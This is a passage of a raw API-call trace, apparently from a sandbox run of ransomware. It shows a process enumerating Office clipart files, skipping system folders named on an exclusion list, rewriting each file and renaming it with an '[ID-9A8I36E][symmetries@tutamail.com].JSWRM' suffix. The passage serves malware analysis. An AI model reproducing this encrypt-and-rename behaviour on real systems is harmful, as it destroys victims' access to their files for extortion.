dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0099.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0099.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0099.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0099.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0099.482] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01297_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01297_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01297_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01297_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0099.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0099.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0099.483] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10491364, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2bc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01298_.GIF", cAlternateFileName="")) returned 1 [0099.483] lstrcmpiW (lpString1="WB01298_.GIF", lpString2=".") returned 1 [0099.483] lstrcmpiW (lpString1="WB01298_.GIF", lpString2="..") returned 1 [0099.483] lstrcmpiW (lpString1="WB01298_.GIF", lpString2="...") returned 1 [0099.483] lstrcmpiW (lpString1="WB01298_.GIF", lpString2="windows") returned -1 [0099.483] lstrcmpiW (lpString1="WB01298_.GIF", lpString2="recovery") returned 1 [0099.483] lstrcmpiW (lpString1="WB01298_.GIF", lpString2="perflogs") returned 1 [0099.483] lstrcmpiW (lpString1="WB01298_.GIF", lpString2="documents and settings") returned 1 [0099.483] lstrcmpiW (lpString1="WB01298_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.483] lstrcmpiW (lpString1="WB01298_.GIF", lpString2="system volume information") returned 1 [0099.483] lstrcmpiW (lpString1="WB01298_.GIF", lpString2="msocache") returned 1 [0099.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0099.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01298_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01298_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01298_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0099.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0099.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01298_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01298_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01298_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0099.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0099.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0099.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0099.484] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01298_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01298_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.484] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=700) returned 1 [0099.484] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2b0) returned 0x20b1f8 [0099.484] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x2b0, lpOverlapped=0x0) returned 1 [0099.485] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.485] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x2b0, lpOverlapped=0x0) returned 1 [0099.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0099.485] CloseHandle (hObject=0x314) returned 1 [0099.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0099.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0099.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0099.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0099.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0099.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0099.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0099.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0099.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0099.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0099.486] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01298_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01298_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01298_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01298_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0099.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0099.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0099.487] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10491364, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01299_.GIF", cAlternateFileName="")) returned 1 [0099.487] lstrcmpiW (lpString1="WB01299_.GIF", lpString2=".") returned 1 [0099.488] lstrcmpiW (lpString1="WB01299_.GIF", lpString2="..") returned 1 [0099.488] lstrcmpiW (lpString1="WB01299_.GIF", lpString2="...") returned 1 [0099.488] lstrcmpiW (lpString1="WB01299_.GIF", lpString2="windows") returned -1 [0099.488] lstrcmpiW (lpString1="WB01299_.GIF", lpString2="recovery") returned 1 [0099.488] lstrcmpiW (lpString1="WB01299_.GIF", lpString2="perflogs") returned 1 [0099.488] lstrcmpiW (lpString1="WB01299_.GIF", lpString2="documents and settings") returned 1 [0099.488] lstrcmpiW (lpString1="WB01299_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.488] lstrcmpiW (lpString1="WB01299_.GIF", lpString2="system volume information") returned 1 [0099.488] lstrcmpiW (lpString1="WB01299_.GIF", lpString2="msocache") returned 1 [0099.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0099.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01299_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01299_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01299_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0099.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0099.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01299_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01299_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01299_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0099.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0099.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0099.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0099.488] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01299_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01299_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.489] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=318) returned 1 [0099.489] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x21be68 [0099.489] ReadFile (in: hFile=0x314, lpBuffer=0x21be68, nNumberOfBytesToRead=0x130, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x21be68*, lpNumberOfBytesRead=0x345e89c*=0x130, lpOverlapped=0x0) returned 1 [0099.490] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.490] WriteFile (in: hFile=0x314, lpBuffer=0x21be68*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x21be68*, lpNumberOfBytesWritten=0x345e898*=0x130, lpOverlapped=0x0) returned 1 [0099.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21be68 | out: hHeap=0x1e0000) returned 1 [0099.490] CloseHandle (hObject=0x314) returned 1 [0099.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0099.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0099.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0099.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0099.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0099.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0099.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0099.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0099.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0099.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0099.490] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01299_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01299_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01299_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01299_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0099.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0099.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0099.491] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10491364, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x250, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01300_.GIF", cAlternateFileName="")) returned 1 [0099.491] lstrcmpiW (lpString1="WB01300_.GIF", lpString2=".") returned 1 [0099.491] lstrcmpiW (lpString1="WB01300_.GIF", lpString2="..") returned 1 [0099.491] lstrcmpiW (lpString1="WB01300_.GIF", lpString2="...") returned 1 [0099.491] lstrcmpiW (lpString1="WB01300_.GIF", lpString2="windows") returned -1 [0099.491] lstrcmpiW (lpString1="WB01300_.GIF", lpString2="recovery") returned 1 [0099.492] lstrcmpiW (lpString1="WB01300_.GIF", lpString2="perflogs") returned 1 [0099.492] lstrcmpiW (lpString1="WB01300_.GIF", lpString2="documents and settings") returned 1 [0099.492] lstrcmpiW (lpString1="WB01300_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.492] lstrcmpiW (lpString1="WB01300_.GIF", lpString2="system volume information") returned 1 [0099.492] lstrcmpiW (lpString1="WB01300_.GIF", lpString2="msocache") returned 1 [0099.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0099.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01300_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01300_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01300_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0099.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0099.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01300_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01300_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01300_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0099.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0099.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0099.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0099.492] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01300_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01300_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.493] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=592) returned 1 [0099.493] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x250) returned 0x20b1f8 [0099.493] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x250, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x250, lpOverlapped=0x0) returned 1 [0099.494] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.494] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x250, lpOverlapped=0x0) returned 1 [0099.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0099.494] CloseHandle (hObject=0x314) returned 1 [0099.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0099.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0099.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0099.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0099.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0099.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0099.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0099.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0099.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0099.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0099.494] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01300_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01300_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01300_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01300_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0099.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0099.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0099.496] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10491364, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2a9, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01301_.GIF", cAlternateFileName="")) returned 1 [0099.496] lstrcmpiW (lpString1="WB01301_.GIF", lpString2=".") returned 1 [0099.496] lstrcmpiW (lpString1="WB01301_.GIF", lpString2="..") returned 1 [0099.496] lstrcmpiW (lpString1="WB01301_.GIF", lpString2="...") returned 1 [0099.496] lstrcmpiW 